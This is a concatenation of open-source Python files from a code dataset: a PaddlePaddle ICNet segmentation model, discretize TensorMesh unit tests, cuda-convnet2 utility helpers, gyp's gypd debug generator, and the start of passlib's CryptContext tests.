lcy-seso/models | fluid/icnet/icnet.py | 1 | 9220 | import paddle.fluid as fluid
import numpy as np
import sys
def conv(input,
k_h,
k_w,
c_o,
s_h,
s_w,
relu=False,
padding="VALID",
biased=False,
name=None):
act = None
tmp = input
if relu:
act = "relu"
if padding == "SAME":
padding_h = max(k_h - s_h, 0)
padding_w = max(k_w - s_w, 0)
padding_top = padding_h / 2
padding_left = padding_w / 2
padding_bottom = padding_h - padding_top
padding_right = padding_w - padding_left
padding = [
0, 0, 0, 0, padding_top, padding_bottom, padding_left, padding_right
]
tmp = fluid.layers.pad(tmp, padding)
tmp = fluid.layers.conv2d(
tmp,
num_filters=c_o,
filter_size=[k_h, k_w],
stride=[s_h, s_w],
groups=1,
act=act,
bias_attr=biased,
use_cudnn=False,
name=name)
return tmp
def atrous_conv(input,
k_h,
k_w,
c_o,
dilation,
relu=False,
padding="VALID",
biased=False,
name=None):
act = None
if relu:
act = "relu"
tmp = input
if padding == "SAME":
# stride is 1 here, so pad by the dilated kernel extent
padding_h = max(k_h + (k_h - 1) * (dilation - 1) - 1, 0)
padding_w = max(k_w + (k_w - 1) * (dilation - 1) - 1, 0)
padding_top = padding_h / 2
padding_left = padding_w / 2
padding_bottom = padding_h - padding_top
padding_right = padding_w - padding_left
padding = [
0, 0, 0, 0, padding_top, padding_bottom, padding_left, padding_right
]
tmp = fluid.layers.pad(tmp, padding)
tmp = fluid.layers.conv2d(
tmp,
num_filters=c_o,
filter_size=[k_h, k_w],
dilation=dilation,
groups=1,
act=act,
bias_attr=biased,
use_cudnn=False,
name=name)
return tmp
def zero_padding(input, padding):
return fluid.layers.pad(input,
[0, 0, 0, 0, padding, padding, padding, padding])
def bn(input, relu=False, name=None, is_test=False):
act = None
if relu:
act = 'relu'
name = input.name.split(".")[0] + "_bn"
tmp = fluid.layers.batch_norm(
input, act=act, momentum=0.95, epsilon=1e-5, name=name)
return tmp
def avg_pool(input, k_h, k_w, s_h, s_w, name=None, padding=0):
temp = fluid.layers.pool2d(
input,
pool_size=[k_h, k_w],
pool_type="avg",
pool_stride=[s_h, s_w],
pool_padding=padding,
name=name)
return temp
def max_pool(input, k_h, k_w, s_h, s_w, name=None, padding=0):
temp = fluid.layers.pool2d(
input,
pool_size=[k_h, k_w],
pool_type="max",
pool_stride=[s_h, s_w],
pool_padding=padding,
name=name)
return temp
def interp(input, out_shape):
out_shape = list(out_shape.astype("int32"))
return fluid.layers.resize_bilinear(input, out_shape=out_shape)
def dilation_convs(input):
tmp = res_block(input, filter_num=256, padding=1, name="conv3_2")
tmp = res_block(tmp, filter_num=256, padding=1, name="conv3_3")
tmp = res_block(tmp, filter_num=256, padding=1, name="conv3_4")
tmp = proj_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_1")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_2")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_3")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_4")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_5")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_6")
tmp = proj_block(
tmp, filter_num=1024, padding=4, dilation=4, name="conv5_1")
tmp = res_block(tmp, filter_num=1024, padding=4, dilation=4, name="conv5_2")
tmp = res_block(tmp, filter_num=1024, padding=4, dilation=4, name="conv5_3")
return tmp
def pyramis_pooling(input, input_shape):
shape = np.ceil(input_shape / 32).astype("int32")
h, w = shape
pool1 = avg_pool(input, h, w, h, w)
pool1_interp = interp(pool1, shape)
pool2 = avg_pool(input, h / 2, w / 2, h / 2, w / 2)
pool2_interp = interp(pool2, shape)
pool3 = avg_pool(input, h / 3, w / 3, h / 3, w / 3)
pool3_interp = interp(pool3, shape)
pool4 = avg_pool(input, h / 4, w / 4, h / 4, w / 4)
pool4_interp = interp(pool4, shape)
conv5_3_sum = input + pool4_interp + pool3_interp + pool2_interp + pool1_interp
return conv5_3_sum
def shared_convs(image):
tmp = conv(image, 3, 3, 32, 2, 2, padding='SAME', name="conv1_1_3_3_s2")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 3, 3, 32, 1, 1, padding='SAME', name="conv1_2_3_3")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 3, 3, 64, 1, 1, padding='SAME', name="conv1_3_3_3")
tmp = bn(tmp, relu=True)
tmp = max_pool(tmp, 3, 3, 2, 2, padding=[1, 1])
tmp = proj_block(tmp, filter_num=128, padding=0, name="conv2_1")
tmp = res_block(tmp, filter_num=128, padding=1, name="conv2_2")
tmp = res_block(tmp, filter_num=128, padding=1, name="conv2_3")
tmp = proj_block(tmp, filter_num=256, padding=1, stride=2, name="conv3_1")
return tmp
def res_block(input, filter_num, padding=0, dilation=None, name=None):
tmp = conv(input, 1, 1, filter_num / 4, 1, 1, name=name + "_1_1_reduce")
tmp = bn(tmp, relu=True)
tmp = zero_padding(tmp, padding=padding)
if dilation is None:
tmp = conv(tmp, 3, 3, filter_num / 4, 1, 1, name=name + "_3_3")
else:
tmp = atrous_conv(
tmp, 3, 3, filter_num / 4, dilation, name=name + "_3_3")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 1, 1, filter_num, 1, 1, name=name + "_1_1_increase")
tmp = bn(tmp, relu=False)
tmp = input + tmp
tmp = fluid.layers.relu(tmp)
return tmp
def proj_block(input, filter_num, padding=0, dilation=None, stride=1,
name=None):
proj = conv(
input, 1, 1, filter_num, stride, stride, name=name + "_1_1_proj")
proj_bn = bn(proj, relu=False)
tmp = conv(
input, 1, 1, filter_num / 4, stride, stride, name=name + "_1_1_reduce")
tmp = bn(tmp, relu=True)
tmp = zero_padding(tmp, padding=padding)
if padding == 0:
padding = 'SAME'
else:
padding = 'VALID'
if dilation is None:
tmp = conv(
tmp,
3,
3,
filter_num / 4,
1,
1,
padding=padding,
name=name + "_3_3")
else:
tmp = atrous_conv(
tmp,
3,
3,
filter_num / 4,
dilation,
padding=padding,
name=name + "_3_3")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 1, 1, filter_num, 1, 1, name=name + "_1_1_increase")
tmp = bn(tmp, relu=False)
tmp = proj_bn + tmp
tmp = fluid.layers.relu(tmp)
return tmp
def sub_net_4(input, input_shape):
tmp = interp(input, out_shape=np.ceil(input_shape / 32))
tmp = dilation_convs(tmp)
tmp = pyramis_pooling(tmp, input_shape)
tmp = conv(tmp, 1, 1, 256, 1, 1, name="conv5_4_k1")
tmp = bn(tmp, relu=True)
tmp = interp(tmp, input_shape / 16)
return tmp
def sub_net_2(input):
tmp = conv(input, 1, 1, 128, 1, 1, name="conv3_1_sub2_proj")
tmp = bn(tmp, relu=False)
return tmp
def sub_net_1(input):
tmp = conv(input, 3, 3, 32, 2, 2, padding='SAME', name="conv1_sub1")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 3, 3, 32, 2, 2, padding='SAME', name="conv2_sub1")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 3, 3, 64, 2, 2, padding='SAME', name="conv3_sub1")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 1, 1, 128, 1, 1, name="conv3_sub1_proj")
tmp = bn(tmp, relu=False)
return tmp
def CCF24(sub2_out, sub4_out, input_shape):
tmp = zero_padding(sub4_out, padding=2)
tmp = atrous_conv(tmp, 3, 3, 128, 2, name="conv_sub4")
tmp = bn(tmp, relu=False)
tmp = tmp + sub2_out
tmp = fluid.layers.relu(tmp)
tmp = interp(tmp, input_shape / 8)
return tmp
def CCF124(sub1_out, sub24_out, input_shape):
tmp = zero_padding(sub24_out, padding=2)
tmp = atrous_conv(tmp, 3, 3, 128, 2, name="conv_sub2")
tmp = bn(tmp, relu=False)
tmp = tmp + sub1_out
tmp = fluid.layers.relu(tmp)
tmp = interp(tmp, input_shape / 4)
return tmp
def icnet(data, num_classes, input_shape):
image_sub1 = data
image_sub2 = interp(data, out_shape=input_shape * 0.5)
s_convs = shared_convs(image_sub2)
sub4_out = sub_net_4(s_convs, input_shape)
sub2_out = sub_net_2(s_convs)
sub1_out = sub_net_1(image_sub1)
sub24_out = CCF24(sub2_out, sub4_out, input_shape)
sub124_out = CCF124(sub1_out, sub24_out, input_shape)
conv6_cls = conv(
sub124_out, 1, 1, num_classes, 1, 1, biased=True, name="conv6_cls")
sub4_out = conv(
sub4_out, 1, 1, num_classes, 1, 1, biased=True, name="sub4_out")
sub24_out = conv(
sub24_out, 1, 1, num_classes, 1, 1, biased=True, name="sub24_out")
return sub4_out, sub24_out, conv6_cls
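# A hedged build sketch (input size and class count are illustrative):
# wire the three branches up inside a fluid program for 19-class,
# 1024x2048 input.
def _icnet_example():
    input_shape = np.array([1024, 2048])
    images = fluid.layers.data(
        name='image', shape=[3, 1024, 2048], dtype='float32')
    return icnet(images, 19, input_shape)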
| apache-2.0 |
simpeg/discretize | tests/base/test_tensor.py | 1 | 7915 | import numpy as np
import unittest
import discretize
from pymatsolver import Solver
TOL = 1e-10
class BasicTensorMeshTests(unittest.TestCase):
def setUp(self):
a = np.array([1, 1, 1])
b = np.array([1, 2])
c = np.array([1, 4])
self.mesh2 = discretize.TensorMesh([a, b], [3, 5])
self.mesh3 = discretize.TensorMesh([a, b, c])
def test_gridded_2D(self):
H = self.mesh2.h_gridded
test_hx = np.all(H[:, 0] == np.r_[1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
test_hy = np.all(H[:, 1] == np.r_[1.0, 1.0, 1.0, 2.0, 2.0, 2.0])
self.assertTrue(test_hx and test_hy)
def test_gridded_3D(self):
H = self.mesh3.h_gridded
test_hx = np.all(
H[:, 0] == np.r_[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
)
test_hy = np.all(
H[:, 1] == np.r_[1.0, 1.0, 1.0, 2.0, 2.0, 2.0, 1.0, 1.0, 1.0, 2.0, 2.0, 2.0]
)
test_hz = np.all(
H[:, 2] == np.r_[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 4.0, 4.0, 4.0, 4.0, 4.0, 4.0]
)
self.assertTrue(test_hx and test_hy and test_hz)
def test_vectorN_2D(self):
testNx = np.array([3, 4, 5, 6])
testNy = np.array([5, 6, 8])
xtest = np.all(self.mesh2.vectorNx == testNx)
ytest = np.all(self.mesh2.vectorNy == testNy)
self.assertTrue(xtest and ytest)
def test_vectorCC_2D(self):
testNx = np.array([3.5, 4.5, 5.5])
testNy = np.array([5.5, 7])
xtest = np.all(self.mesh2.vectorCCx == testNx)
ytest = np.all(self.mesh2.vectorCCy == testNy)
self.assertTrue(xtest and ytest)
def test_area_3D(self):
test_area = np.array(
[1, 1, 1, 1, 2, 2, 2, 2, 4, 4, 4, 4, 8, 8, 8, 8,  # x-faces
1, 1, 1, 1, 1, 1, 1, 1, 1, 4, 4, 4, 4, 4, 4, 4, 4, 4,  # y-faces
1, 1, 1, 2, 2, 2, 1, 1, 1, 2, 2, 2, 1, 1, 1, 2, 2, 2]  # z-faces
)
t1 = np.all(self.mesh3.area == test_area)
self.assertTrue(t1)
def test_vol_3D(self):
test_vol = np.array([1, 1, 1, 2, 2, 2, 4, 4, 4, 8, 8, 8])
t1 = np.all(self.mesh3.vol == test_vol)
self.assertTrue(t1)
def test_vol_2D(self):
test_vol = np.array([1, 1, 1, 2, 2, 2])
t1 = np.all(self.mesh2.vol == test_vol)
self.assertTrue(t1)
def test_edge_3D(self):
test_edge = np.array(
[1] * 27  # x-edges, all length 1
+ [1, 1, 1, 1, 2, 2, 2, 2] * 3  # y-edges, hy = [1, 2]
+ [1] * 12 + [4] * 12  # z-edges, hz = [1, 4]
)
t1 = np.all(self.mesh3.edge == test_edge)
self.assertTrue(t1)
def test_edge_2D(self):
test_edge = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2])
t1 = np.all(self.mesh2.edge == test_edge)
self.assertTrue(t1)
def test_oneCell(self):
hx = np.array([1e-5])
M = discretize.TensorMesh([hx])
self.assertTrue(M.nC == 1)
def test_printing(self):
print(discretize.TensorMesh([10]))
print(discretize.TensorMesh([10, 10]))
print(discretize.TensorMesh([10, 10, 10]))
def test_centering(self):
M1d = discretize.TensorMesh([10], x0="C")
M2d = discretize.TensorMesh([10, 10], x0="CC")
M3d = discretize.TensorMesh([10, 10, 10], x0="CCC")
self.assertLess(np.abs(M1d.x0 + 0.5).sum(), TOL)
self.assertLess(np.abs(M2d.x0 + 0.5).sum(), TOL)
self.assertLess(np.abs(M3d.x0 + 0.5).sum(), TOL)
def test_negative(self):
M1d = discretize.TensorMesh([10], x0="N")
self.assertRaises(Exception, discretize.TensorMesh, [10], "F")
M2d = discretize.TensorMesh([10, 10], x0="NN")
M3d = discretize.TensorMesh([10, 10, 10], x0="NNN")
self.assertLess(np.abs(M1d.x0 + 1.0).sum(), TOL)
self.assertLess(np.abs(M2d.x0 + 1.0).sum(), TOL)
self.assertLess(np.abs(M3d.x0 + 1.0).sum(), TOL)
def test_cent_neg(self):
M3d = discretize.TensorMesh([10, 10, 10], x0="C0N")
self.assertLess(np.abs(M3d.x0 + np.r_[0.5, 0, 1.0]).sum(), TOL)
def test_tensor(self):
M = discretize.TensorMesh([[(10.0, 2)]])
self.assertLess(np.abs(M.hx - np.r_[10.0, 10.0]).sum(), TOL)
def test_serialization(self):
mesh = discretize.TensorMesh.deserialize(self.mesh2.serialize())
self.assertTrue(np.all(self.mesh2.x0 == mesh.x0))
self.assertTrue(np.all(self.mesh2.shape_cells == mesh.shape_cells))
self.assertTrue(np.all(self.mesh2.hx == mesh.hx))
self.assertTrue(np.all(self.mesh2.hy == mesh.hy))
self.assertTrue(np.all(self.mesh2.gridCC == mesh.gridCC))
class TestPoissonEqn(discretize.tests.OrderTest):
name = "Poisson Equation"
meshSizes = [10, 16, 20]
def getError(self):
# Create some functions to integrate
fun = (
lambda x: np.sin(2 * np.pi * x[:, 0])
* np.sin(2 * np.pi * x[:, 1])
* np.sin(2 * np.pi * x[:, 2])
)
sol = lambda x: -3.0 * ((2 * np.pi) ** 2) * fun(x)
self.M.setCellGradBC("dirichlet")
D = self.M.faceDiv
G = self.M.cellGrad
if self.forward:
sA = sol(self.M.gridCC)
sN = D * G * fun(self.M.gridCC)
err = np.linalg.norm((sA - sN), np.inf)
else:
fA = fun(self.M.gridCC)
fN = Solver(D * G) * (sol(self.M.gridCC))
err = np.linalg.norm((fA - fN), np.inf)
return err
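# forward: apply the discrete Laplacian D*G to the exact potential and
# compare against the analytic source; backward: solve D*G*u = source and
# compare the recovered potential against the exact one.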
def test_orderForward(self):
self.name = "Poisson Equation - Forward"
self.forward = True
self.orderTest()
def test_orderBackward(self):
self.name = "Poisson Equation - Backward"
self.forward = False
self.orderTest()
if __name__ == "__main__":
unittest.main()
| mit |
abhaysac/cuda-convnet2 | python_util/util.py | 181 | 2825 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import cPickle
import os
from cStringIO import StringIO
class UnpickleError(Exception):
pass
GPU_LOCK_NO_SCRIPT = -2
GPU_LOCK_NO_LOCK = -1
def pickle(filename, data):
fo = filename
if isinstance(filename, str):
fo = open(filename, "wb") # binary mode: HIGHEST_PROTOCOL writes a binary pickle
cPickle.dump(data, fo, protocol=cPickle.HIGHEST_PROTOCOL)
fo.close()
def unpickle(filename):
if not os.path.exists(filename):
raise UnpickleError("Path '%s' does not exist." % filename)
fo = open(filename, 'rb') # binary mode to match pickle() above
z = StringIO()
file_size = os.fstat(fo.fileno()).st_size
# Read 1GB at a time to avoid overflow
while fo.tell() < file_size:
z.write(fo.read(1 << 30))
fo.close()
data = cPickle.loads(z.getvalue()) # renamed from 'dict' to avoid shadowing the builtin
z.close()
return data
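# Round-trip example (hypothetical path, for illustration only):
# pickle('/tmp/meta.pkl', {'epoch': 3})
# assert unpickle('/tmp/meta.pkl')['epoch'] == 3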
def is_intel_machine():
VENDOR_ID_REGEX = re.compile(r'^vendor_id\s+: (\S+)')
f = open('/proc/cpuinfo')
for line in f:
m = VENDOR_ID_REGEX.match(line)
if m:
f.close()
return m.group(1) == 'GenuineIntel'
f.close()
return False
# Returns the CPUs associated with a given GPU
def get_cpus_for_gpu(gpu):
#proc = subprocess.Popen(['nvidia-smi', '-q', '-i', str(gpu)], stdout=subprocess.PIPE)
#lines = proc.communicate()[0]
#lines = subprocess.check_output(['nvidia-smi', '-q', '-i', str(gpu)]).split(os.linesep)
with open('/proc/driver/nvidia/gpus/%d/information' % gpu) as f:
for line in f:
if line.startswith('Bus Location'):
bus_id = line.split(':', 1)[1].strip()
bus_id = bus_id[:7] + ':' + bus_id[8:]
ff = open('/sys/module/nvidia/drivers/pci:nvidia/%s/local_cpulist' % bus_id)
cpus_str = ff.readline()
ff.close()
# cpulist is comma-separated ranges, e.g. "0-7,16-23"; expand each
# "lo-hi" range into the individual CPU indices.
cpus = [cpu for s in cpus_str.split(',')
for cpu in range(int(s.split('-')[0]), int(s.split('-')[1]) + 1)]
return cpus
return [-1]
def get_cpu():
if is_intel_machine():
return 'intel'
return 'amd'
def is_windows_machine():
return os.name == 'nt'
def tryint(s):
try:
return int(s)
except (ValueError, TypeError):
return s
def alphanum_key(s):
return [tryint(c) for c in re.split('([0-9]+)', s)]
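# alphanum_key enables natural sorting, e.g. (illustrative):
# sorted(['data_batch_10', 'data_batch_2'], key=alphanum_key)
# -> ['data_batch_2', 'data_batch_10']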
| apache-2.0 |
gitromand/phantomjs | src/breakpad/src/tools/gyp/pylib/gyp/generator/gypd.py | 151 | 3320 | #!/usr/bin/python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypd output module
This module produces gyp input as its output. Output files are given the
.gypd extension to avoid overwriting the .gyp files that they are generated
from. Internal references to .gyp files (such as those found in
"dependencies" sections) are not adjusted to point to .gypd files instead;
unlike other paths, which are relative to the .gyp or .gypd file, such paths
are relative to the directory from which gyp was run to create the .gypd file.
This generator module is intended to be a sample and a debugging aid, hence
the "d" for "debug" in .gypd. It is useful to inspect the results of the
various merges, expansions, and conditional evaluations performed by gyp
and to see a representation of what would be fed to a generator module.
It's not advisable to rename .gypd files produced by this module to .gyp,
because they will have all merges, expansions, and evaluations already
performed and the relevant constructs not present in the output; paths to
dependencies may be wrong; and various sections that do not belong in .gyp
files such as "included_files" and "*_excluded" will be present.
Output will also be stripped of comments. This is not intended to be a
general-purpose gyp pretty-printer; for that, you probably just want to
run "pprint.pprint(eval(open('source.gyp').read()))", which will still strip
comments but won't do all of the other things done to this module's output.
The specific formatting of the output generated by this module is subject
to change.
"""
import gyp.common
import errno
import os
import pprint
# These variables should just be spit back out as variable references.
_generator_identity_variables = [
'EXECUTABLE_PREFIX',
'EXECUTABLE_SUFFIX',
'INTERMEDIATE_DIR',
'PRODUCT_DIR',
'RULE_INPUT_ROOT',
'RULE_INPUT_EXT',
'RULE_INPUT_NAME',
'RULE_INPUT_PATH',
'SHARED_INTERMEDIATE_DIR',
]
# gypd doesn't define a default value for OS like many other generator
# modules. Specify "-D OS=whatever" on the command line to provide a value.
generator_default_variables = {
}
# gypd supports multiple toolsets
generator_supports_multiple_toolsets = True
# TODO(mark): This always uses <, which isn't right. The input module should
# notify the generator to tell it which phase it is operating in, and this
# module should use < for the early phase and then switch to > for the late
# phase. Bonus points for carrying @ back into the output too.
for v in _generator_identity_variables:
generator_default_variables[v] = '<(%s)' % v
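# e.g. generator_default_variables['PRODUCT_DIR'] == '<(PRODUCT_DIR)', so
# the .gypd output re-emits the variable reference instead of an expanded path.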
def GenerateOutput(target_list, target_dicts, data, params):
output_files = {}
for qualified_target in target_list:
[input_file, target] = \
gyp.common.ParseQualifiedTarget(qualified_target)[0:2]
if input_file[-4:] != '.gyp':
continue
input_file_stem = input_file[:-4]
output_file = input_file_stem + params['options'].suffix + '.gypd'
if output_file not in output_files:
output_files[output_file] = input_file
for output_file, input_file in output_files.iteritems():
output = open(output_file, 'w')
pprint.pprint(data[input_file], output)
output.close()
| bsd-3-clause |
austindlawless/cudas | lambda/signup/passlib/tests/test_context.py | 6 | 64739 | """tests for passlib.context"""
#=============================================================================
# imports
#=============================================================================
# core
from __future__ import with_statement
from passlib.utils.compat import PY3
if PY3:
from configparser import NoSectionError
else:
from ConfigParser import NoSectionError
import hashlib
import logging; log = logging.getLogger(__name__)
import re
import os
import time
import warnings
import sys
# site
# pkg
from passlib import hash
from passlib.context import CryptContext, LazyCryptContext
from passlib.exc import PasslibConfigWarning
from passlib.utils import tick, to_bytes, to_unicode
from passlib.utils.compat import irange, u, unicode, str_to_uascii, PY2
import passlib.utils.handlers as uh
from passlib.tests.utils import TestCase, catch_warnings, set_file, TICK_RESOLUTION, quicksleep
from passlib.registry import (register_crypt_handler_path,
_has_crypt_handler as has_crypt_handler,
_unload_handler_name as unload_handler_name,
get_crypt_handler,
)
# local
#=============================================================================
# support
#=============================================================================
here = os.path.abspath(os.path.dirname(__file__))
def merge_dicts(first, *args, **kwds):
target = first.copy()
for arg in args:
target.update(arg)
if kwds:
target.update(kwds)
return target
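# e.g. merge_dicts(dict(a=1), dict(a=2, b=3), c=4) -> {'a': 2, 'b': 3, 'c': 4}
# (later arguments win, and keyword overrides are applied last)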
#=============================================================================
#
#=============================================================================
class CryptContextTest(TestCase):
descriptionPrefix = "CryptContext"
# TODO: these unittests could really use a good cleanup
# and reorganizing, to ensure they're getting everything.
#===================================================================
# sample configurations used in tests
#===================================================================
#---------------------------------------------------------------
# sample 1 - typical configuration
#---------------------------------------------------------------
sample_1_schemes = ["des_crypt", "md5_crypt", "bsdi_crypt", "sha512_crypt"]
sample_1_handlers = [get_crypt_handler(name) for name in sample_1_schemes]
sample_1_dict = dict(
schemes = sample_1_schemes,
default = "md5_crypt",
all__vary_rounds = 0.1,
bsdi_crypt__max_rounds = 30000,
bsdi_crypt__default_rounds = 25000,
sha512_crypt__max_rounds = 50000,
sha512_crypt__min_rounds = 40000,
)
sample_1_resolved_dict = merge_dicts(sample_1_dict,
schemes = sample_1_handlers)
sample_1_unnormalized = u("""\
[passlib]
schemes = des_crypt, md5_crypt, bsdi_crypt, sha512_crypt
default = md5_crypt
; this is using %...
all__vary_rounds = 10%%
; this is using 'rounds' instead of 'default_rounds'
bsdi_crypt__rounds = 25000
bsdi_crypt__max_rounds = 30000
sha512_crypt__max_rounds = 50000
sha512_crypt__min_rounds = 40000
""")
sample_1_unicode = u("""\
[passlib]
schemes = des_crypt, md5_crypt, bsdi_crypt, sha512_crypt
default = md5_crypt
all__vary_rounds = 0.1
bsdi_crypt__default_rounds = 25000
bsdi_crypt__max_rounds = 30000
sha512_crypt__max_rounds = 50000
sha512_crypt__min_rounds = 40000
""")
#---------------------------------------------------------------
# sample 1 external files
#---------------------------------------------------------------
# sample 1 string with '\n' linesep
sample_1_path = os.path.join(here, "sample1.cfg")
# sample 1 with '\r\n' linesep
sample_1b_unicode = sample_1_unicode.replace(u("\n"), u("\r\n"))
sample_1b_path = os.path.join(here, "sample1b.cfg")
# sample 1 using UTF-16 and alt section
sample_1c_bytes = sample_1_unicode.replace(u("[passlib]"),
u("[mypolicy]")).encode("utf-16")
sample_1c_path = os.path.join(here, "sample1c.cfg")
# enable to regenerate sample files
if False:
set_file(sample_1_path, sample_1_unicode)
set_file(sample_1b_path, sample_1b_unicode)
set_file(sample_1c_path, sample_1c_bytes)
#---------------------------------------------------------------
# sample 2 & 12 - options patch
#---------------------------------------------------------------
sample_2_dict = dict(
# using this to test full replacement of existing options
bsdi_crypt__min_rounds = 29000,
bsdi_crypt__max_rounds = 35000,
bsdi_crypt__default_rounds = 31000,
# using this to test partial replacement of existing options
sha512_crypt__min_rounds=45000,
)
sample_2_unicode = """\
[passlib]
bsdi_crypt__min_rounds = 29000
bsdi_crypt__max_rounds = 35000
bsdi_crypt__default_rounds = 31000
sha512_crypt__min_rounds = 45000
"""
# sample 2 overlayed on top of sample 1
sample_12_dict = merge_dicts(sample_1_dict, sample_2_dict)
#---------------------------------------------------------------
# sample 3 & 123 - just changing default from sample 1
#---------------------------------------------------------------
sample_3_dict = dict(
default="sha512_crypt",
)
# sample 3 overlayed on 2 overlayed on 1
sample_123_dict = merge_dicts(sample_12_dict, sample_3_dict)
#---------------------------------------------------------------
# sample 4 - used by api tests
#---------------------------------------------------------------
sample_4_dict = dict(
schemes = [ "des_crypt", "md5_crypt", "phpass", "bsdi_crypt",
"sha256_crypt"],
deprecated = [ "des_crypt", ],
default = "sha256_crypt",
bsdi_crypt__max_rounds = 30,
bsdi_crypt__default_rounds = 25,
bsdi_crypt__vary_rounds = 0,
sha256_crypt__max_rounds = 3000,
sha256_crypt__min_rounds = 2000,
sha256_crypt__default_rounds = 3000,
phpass__ident = "H",
phpass__default_rounds = 7,
)
#===================================================================
# constructors
#===================================================================
def test_01_constructor(self):
"""test class constructor"""
# test blank constructor works correctly
ctx = CryptContext()
self.assertEqual(ctx.to_dict(), {})
# test sample 1 with scheme=names
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 with scheme=handlers
ctx = CryptContext(**self.sample_1_resolved_dict)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 2: options w/o schemes
ctx = CryptContext(**self.sample_2_dict)
self.assertEqual(ctx.to_dict(), self.sample_2_dict)
# test sample 3: default only
ctx = CryptContext(**self.sample_3_dict)
self.assertEqual(ctx.to_dict(), self.sample_3_dict)
# test unicode scheme names (issue 54)
ctx = CryptContext(schemes=[u("sha256_crypt")])
self.assertEqual(ctx.schemes(), ("sha256_crypt",))
def test_02_from_string(self):
"""test from_string() constructor"""
# test sample 1 unicode
ctx = CryptContext.from_string(self.sample_1_unicode)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 with unnormalized inputs
ctx = CryptContext.from_string(self.sample_1_unnormalized)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 utf-8
ctx = CryptContext.from_string(self.sample_1_unicode.encode("utf-8"))
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 w/ '\r\n' linesep
ctx = CryptContext.from_string(self.sample_1b_unicode)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 using UTF-16 and alt section
ctx = CryptContext.from_string(self.sample_1c_bytes, section="mypolicy",
encoding="utf-16")
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test wrong type
self.assertRaises(TypeError, CryptContext.from_string, None)
# test missing section
self.assertRaises(NoSectionError, CryptContext.from_string,
self.sample_1_unicode, section="fakesection")
def test_03_from_path(self):
"""test from_path() constructor"""
# make sure sample files exist
if not os.path.exists(self.sample_1_path):
raise RuntimeError("can't find data file: %r" % self.sample_1_path)
# test sample 1
ctx = CryptContext.from_path(self.sample_1_path)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 w/ '\r\n' linesep
ctx = CryptContext.from_path(self.sample_1b_path)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test sample 1 encoding using UTF-16 and alt section
ctx = CryptContext.from_path(self.sample_1c_path, section="mypolicy",
encoding="utf-16")
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test missing file
self.assertRaises(EnvironmentError, CryptContext.from_path,
os.path.join(here, "sample1xxx.cfg"))
# test missing section
self.assertRaises(NoSectionError, CryptContext.from_path,
self.sample_1_path, section="fakesection")
def test_04_copy(self):
"""test copy() method"""
cc1 = CryptContext(**self.sample_1_dict)
# overlay sample 2 onto copy
cc2 = cc1.copy(**self.sample_2_dict)
self.assertEqual(cc1.to_dict(), self.sample_1_dict)
self.assertEqual(cc2.to_dict(), self.sample_12_dict)
# check that repeating overlay makes no change
cc2b = cc2.copy(**self.sample_2_dict)
self.assertEqual(cc1.to_dict(), self.sample_1_dict)
self.assertEqual(cc2b.to_dict(), self.sample_12_dict)
# overlay sample 3 on copy
cc3 = cc2.copy(**self.sample_3_dict)
self.assertEqual(cc3.to_dict(), self.sample_123_dict)
# test empty copy creates separate copy
cc4 = cc1.copy()
self.assertIsNot(cc4, cc1)
self.assertEqual(cc1.to_dict(), self.sample_1_dict)
self.assertEqual(cc4.to_dict(), self.sample_1_dict)
# ... and that modifying copy doesn't affect original
cc4.update(**self.sample_2_dict)
self.assertEqual(cc1.to_dict(), self.sample_1_dict)
self.assertEqual(cc4.to_dict(), self.sample_12_dict)
def test_09_repr(self):
"""test repr()"""
cc1 = CryptContext(**self.sample_1_dict)
self.assertRegex(repr(cc1), "^<CryptContext at 0x[0-9a-f]+>$")
#===================================================================
# modifiers
#===================================================================
def test_10_load(self):
"""test load() / load_path() method"""
# NOTE: load() is the workhorse that handles all policy parsing,
# compilation, and validation. most of its features are tested
# elsewhere, since all the constructors and modifiers are just
# wrappers for it.
# source_type 'auto'
ctx = CryptContext()
# detect dict
ctx.load(self.sample_1_dict)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# detect unicode string
ctx.load(self.sample_1_unicode)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# detect bytes string
ctx.load(self.sample_1_unicode.encode("utf-8"))
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# anything else - TypeError
self.assertRaises(TypeError, ctx.load, None)
# NOTE: load_path() tested by from_path()
# NOTE: additional string tests done by from_string()
